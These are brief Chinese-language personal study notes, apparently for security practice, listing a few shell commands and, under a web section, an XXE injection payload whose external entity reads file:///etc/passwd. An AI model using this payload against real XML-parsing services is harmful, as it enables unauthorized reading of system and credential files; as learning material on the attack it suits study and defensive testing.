# 筆記酷 ## genernall skills ```cmd= grep -r "123" -找尋關鍵字 man 說明頁面 ???? 通往福(再研究) ``` ## web ### XML XXE 注入 放這東西攻擊可取得file:///etc/passwd的資料 ```html <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root>&xxe;</root> ```